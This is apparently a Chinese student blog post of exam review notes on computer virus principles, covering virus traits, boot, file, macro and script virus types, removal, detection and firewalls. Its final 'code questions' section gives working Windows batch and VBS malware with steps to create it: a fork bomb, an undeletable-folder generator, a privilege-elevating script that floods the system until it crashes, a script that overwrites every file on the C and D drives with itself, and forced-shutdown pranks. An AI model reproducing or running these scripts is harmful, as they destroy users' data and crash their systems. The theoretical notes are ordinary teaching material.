抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

病毒原理考点

期末考试病毒原理

发布于:2020年12月17日

次浏览

病毒原理考点

病毒程序一般基入对象的侵入一般有哪几种方式。(对象的不同有哪几种

  1. 磁盘引导区传染的计算机病毒
  2. 操作系统传染
  3. 可执行程序传染

计算机病毒的特点

  1. 计算机病毒特征1:传染性

    可以通过中介进行传染,如U盘、光盘、电子邮件等等。

  2. 计算机病毒特征2:破坏性

    可以影响我们计算机上程序的正常运行,删除我们的文件。

  3. 计算机病毒特征3:隐蔽性

    计算机病毒的本身大小很小,,它通常衣服在在正常程序之中或磁盘引导扇区中,病毒会想方设法隐藏自身。

  4. 计算机病毒特征4:潜伏性

    有些病毒并不会立刻发作,而是悄悄的隐藏起来,然后在用户不察觉的情况下进行传染。

  5. 计算机病毒特征5:触发性

    有些病毒被设置了一些条件,只有当满足了这些条件时才会实施攻击。比较常见的就是日期条件了。

什么叫计算机病毒

计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码

计算机病毒怎么清除

针对于特定病毒的清除

  1. 引导型:

    病毒代码放入软盘或硬盘的BOOT区,或硬盘的主引导区。

    做法:用正常的分区表信息覆盖病毒。将病毒在文件分配表中设置的坏簇,修改回好簇,使磁盘空间可以供操作系统分配使用。

  2. 文件型:

    病毒码放在宿主程序的前或后部,代码和宿主程序有明显的分界线。检查是否被修改。

    .COM:将染毒文件读入内存,找出分界线,将修改过的代码复原,将修复后的宿主程序写回磁盘。

    .EXE:将染毒文件读入内存,找出分界线,因为exe头部被读入内存,代码地址有变。加载程序后的起始运行地址、程序长度等,根据计算结果修改头部对应参数。将代码复原,设置恰当的文件长度和地址参数,写回磁盘。

  3. 文件与引导复合型:

    依附在可执行文件上,当作载体进行传播,当运行时,系统中有硬盘,则立即感染主引导区,以后用硬盘启动系统时,就有该病毒。

    做法:将硬盘主引导区内病毒清除;记录执行程序的起始地址,终止地址,清除病毒代码。将文件长度改为清毒后的长度。

  4. 脚本计算机病毒:

    做法:

    • 禁用文件系统对象
    • 卸载Windows Scripting Host
    • 删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射
    • 在Windows目录中,找到WScript.exe,更改名称或删除
    • 浏览器ActiveX控件设为禁用
    • 禁止OE自动收发电子邮件
    • 显示所有文件扩展名
    • 将网络连接安全级别设置为中等以上

  5. 宏病毒:

    1. 查看noraml.dot,删除来历不明的宏
    2. 查看noraml.dot,用原文件覆盖被感染的

  6. 特洛伊木马病毒:

    1. 备份重要数据
    2. 立即关闭设备电源
    3. 备份木马入侵现场
    4. 修复木马危害

  7. 蠕虫病毒:

    1. 与防火墙互动
    2. 交换机联动
    3. 通知HIDS(基于主机的入侵监测)
    4. 报警

笼统性病毒的清除方式

  1. 基本方法

    • 简单的工具治疗:winhex、debug,将病毒代码从软件中摘除
    • 专用工具治疗:根据对病毒特征的记录,自动清除感染程序中的病毒代码

  2. 一般过程

    • 剖析病毒样本:掌握病毒的特征,准确识别病毒
    • 研制病毒试验样本:对清除软件进行多次修改和调试
    • 摘除病毒代码

  3. 杀毒的方式

    • 清除被感染文件
    • 删除病毒文件
    • 禁止访问病毒文件
    • 病毒删除后移到隔离
    • 不知道是不是病毒时,不处理

什么是宏病毒,它感染的文件是那些?特点是什么?检测方法、清除方法是什么?

宏病毒:

寄在文档或模板的宏中的计算机病毒,一旦打开这样的文档,宏就会被执行,宏病毒被激活后,转移到用户的计算机上,并驻留在normal模板,从此所有自动保存的文档都会染上宏病毒。

感染文件:

Office家族三大系列。

特点:

  1. 传播速度极快
  2. 制作、变种方便
  3. 破坏性极大
  4. 多平台交叉感染

检测方法:

  1. 在word中,选中normal看有没有一些名字奇怪的自动宏
  2. 不进行操作退出,提示存盘,可能是normal.dot中带毒
  3. word工具栏中,无“宏”
  4. word运行中,内存不足,打印不正常
  5. 运行word时,提示是否启动宏

清除:

  1. 查看noraml.dot,删除来历不明的宏
  2. 查看noraml.dot,用原文件覆盖被感染的

防止病毒入侵的原则、方式是什么?

原则:

主动防御为主,结合被动处理,阻塞传播。

防止外界计算机病毒向机内传染;抑制现有计算机病毒向外传染

  • 对已知病毒的预防
  • 对未来病毒的预防

方式:

  1. 将大量杀毒软件汇集一起,检查是否存在已知计算机病毒。
  2. 检测一些病毒经常改变的系统信息,引导区、中断向量表、可用内存空间等,已确定是否存在病毒
  3. 检测写盘操作,对引导区、主引导区的写操作报警。
  4. 对文件形成一个密码检验码和程序完整性的验证。
  5. 智能判断型:设定病毒行为判定库
  6. 智能监察型:设计病毒特征库、行为知识库等

计算机病毒要达到的最终目标是什么?

破坏系统、数据丢失、数据密级异常、网络瘫痪

复合型病毒是什么?

复合型病毒同时具有多种病毒特征,文件型和引导型的某些特点,或者恶意代码通过多种方式传播等。

依附在可执行文件上,当作载体进行传播,当运行时,系统中有硬盘,则立即感染主引导区,以后用硬盘启动系统时,就有该病毒。

做法:将硬盘主引导区内病毒清除;记录执行程序的起始地址,终止地址,清除病毒代码。将文件长度改为清毒后的长度。

传播途径:电子邮件、web服务器、web终端、网络共享等

文件型病毒感染的是哪一类文件?

扩展名为COM、EXE、SYS、BAT可执行文件。

清除病毒的方法有哪些?

  • 清除被感染文件
  • 删除病毒文件
  • 禁止访问病毒文件
  • 病毒删除后移到隔离
  • 不知道是不是病毒时,不处理

一个移动硬盘被感染了,对它做怎样的处理?

  • 用反病毒软件清除病毒或者在无毒计算机格式化该盘
  • 病毒删除后移到隔离
  • 禁止主机访问病毒文件

给一个状态,要判断是不是中了病毒?

发作特征;

  1. 计算机无法启动
  2. 计算机经常死机
  3. 文件无法打开
  4. 系统提示内存不足
  5. 磁盘空间不足
  6. 数据突然丢失
  7. 系统运行速度慢
  8. 键盘、鼠标锁死
  9. 系统增加大量来历不明的文件
  10. 自动加载某些程序

计算机病毒危害是什么?

  1. 对数据信息直接破坏,删除或修改文件和数据。
  2. 非法占用磁盘空间,对磁盘数据破坏,造成数据丢失。
  3. 将非法数据写DOS内存参数区,引起系统崩溃。
  4. 抢占系统资源,干扰系统运行,影响运行速度

脚本病毒的特点?

使用script代码编写的具有恶意操作意向的程序代码。易用。

  • 编写简单
  • 破坏力大
  • 感染力强
  • 传播范围大
  • 病毒源码易被获取、变种多
  • 欺骗性强
  • 使计算机病毒生产机实现起来很容易

蠕虫病毒的特征?

蠕虫病毒是自包含的程序,能传播自身功能的复件或某些部分到系统中。

  • 通过网络传播的。
  • 主动攻击:无需干预即可运行的攻击程序或代码。
  • 独立程序:不利用文件寄生。
  • 对网络造成拒绝服务
  • 短时间内蔓延网络,造成瘫痪

木马有哪些种类?

  1. 破坏型
  2. 密码发送型
  3. 远程访问型
  4. 键盘记录木马
  5. DOS攻击
  6. 代理木马
  7. FTP木马
  8. 程序杀手
  9. 反弹端口

病毒检测,启发式杀毒技术是什么(静态、动态)?

依据病毒和正常程序之间存在的区别,应用在查杀程序中。“启发”是自我发现的能力,或运用某种方式或方法判定事物的知识和技能。

动态:是以人工智能的方式实现动态反编译代码分析。用debug等程序调试工具,在内存带毒的情况下,动态跟踪,观察工作过程。在静态的基础上,进一步分析

静态:用反汇编程序处理,对程序清单进行分析。将文件感染过程翻转为清除病毒、修复文件。分析可用作特征码的部分等。在静止状态下通过病毒的典型指令特征识别病毒的方法,是对传统特征码扫描的一种补充。

计算机病毒程序的典型组成有哪些模块

计算机病毒程序的典型组成包括引导模块、传染模块和表现模块

CIH?

  • “CIH”计算机病毒属于文件型病毒,别名“win95.CIH”,“Spacefiller”,“Win32.CIH”,“PE_CIH”等。
  • 主要感染Windows 95/98操作系统下的可执行程序。
  • 能够破坏计算机系统硬件,发作时破坏硬盘数据,同时有可能破坏BIOS程序。
  • 依附在其他程序上面,通过网络传播。

防火墙是什么,功能,对它的要求?

防火墙:

防火墙是网络安全的屏障,由软件和硬件组合而成,处于企业或网络群体计算机与外界通道之间。限制外部对内部的访问。防止非法用户的入侵

功能:

  • 提高内部网络安全性
  • 强化网络安全策略
  • 对网络存取和访问进行监控审计
  • 提供网络使用情况的统计数据

要求:

  • 发生可疑事件进行报警,和攻击详情
  • 能记录访问并作出日志记录
  • 实现内部网络重点网段的隔离

病毒防火墙:

  • 对系统实施实时监控,对流入流出系统的数据中可能含有的病毒代码进行过滤。
  • 能有效的阻止病毒从网络向本机系统入侵。
  • 双向过滤,保证本机不会向网络传播病毒。

怎么检测计算机病毒,检测方法是什么?

  1. 借助简单工具:debug等,检测者阅读
  2. 借助专用工具:norton等,能自动扫描
  3. 外观检测法:看计算机是否有明显异常,如屏幕异常、系统变慢等
  4. 特征代码法:与特征码库进行对比
  5. 系统数据对比法:看有无意外坏簇。检查中断向量等。
  6. 实时监控法:监视行为,有异常就及时报警
  7. 软件模拟法:专用来检测变形病毒。是一种软件分析器,模拟一个程序运行环境,将程序载入其中,看他造成的后果

计算机病毒一般分为 引导型、文件型。它们俩的原理是什么?

引导型:

改写磁盘上的引导区中的内容,或改写分区表。利用操作系统的引导模块放在某个固定位置,并且控制权转交方式是基于物理地址,所以病毒占据该物理位置即可获得控制权。执行病毒后,再把控制权转交给引导区。

文件型:

主要感染可执行程序。需要借助于载体。可以把病毒的程序码复制到宿主文件的开头或结尾。

常驻于内存。

代码题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
1.
桌面上创建记事本,改后缀为bat

::输入以下代码

%0|%0

保存后退出,打开会发现无限制的弹窗。这是什么原理呢?

执行脚本的时候,|管道符会将左面的值传给右边,而这里%0是第一个参数(批处理路径),所以会无限执行自己。

2
桌面上创建记事本,改后缀为bat

::输入以下代码

for /l %%i in (1 1 999999) do md A..\

这个病毒利用Windows命名漏洞,创建999999个删除不了也打不开的文件夹。解决方法:把md改为rd

3
桌面上创建记事本,改后缀为bat

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit

:a

set /a a+=1

echo %random%-%random%-%random% > C:\Users\%username%\Desktop\病毒文件.%random%

mshta javascript:alert("您已中第%a%个病毒.");close();

goto a

这个病毒会在后台运行,在桌面重复弹信息框,生成垃圾文件,千万不敢随意测试,因为电脑会消耗尽内存后蓝屏。

4
这种病毒最有破坏性,跟熊猫烧香媲美。同样,桌面上创建记事本,改后缀为bat

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit

for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" >nul

for /f "tokens=* delims=" %%i in ('dir /b C:\*.*') do copy /y "%dpnx0" "%%i" >nul

此程序特别狠,会在后台把C、D盘所有的文件都替换成自己(病毒文件,然后会又被执行)。

5 
创建记事本,后缀改为VBS

=======分割线=======

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -r -t 120 -c ""说我是猪,不说我是猪就两分钟关你机,不信,你试试···"" ",0 ,true

dim a

do while(a <> "我是猪")

a = inputbox ("说我是猪,就不关机,说 ""我是猪"" ","说不说","你写啊",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

loop

msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵,爽"

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "cmd.exe /c shutdown -a",0 ,true

msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"

WScript.Echo("喜欢吗,快点点赞(Y Y)")

a = inputbox ("赞不赞,说赞就解除,不说就不解 ""赞"" ","赞不赞","赞吗",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

loopdo

msgbox chr(13) + chr(13) + chr(13) + "呵呵,爽死了"

另存.VBS

6
@echo off
echo Message here.
shutdown -s -f -t 60 -c "此处键入您要显示的消息。"

更新于:2024年11月12日

考点

评论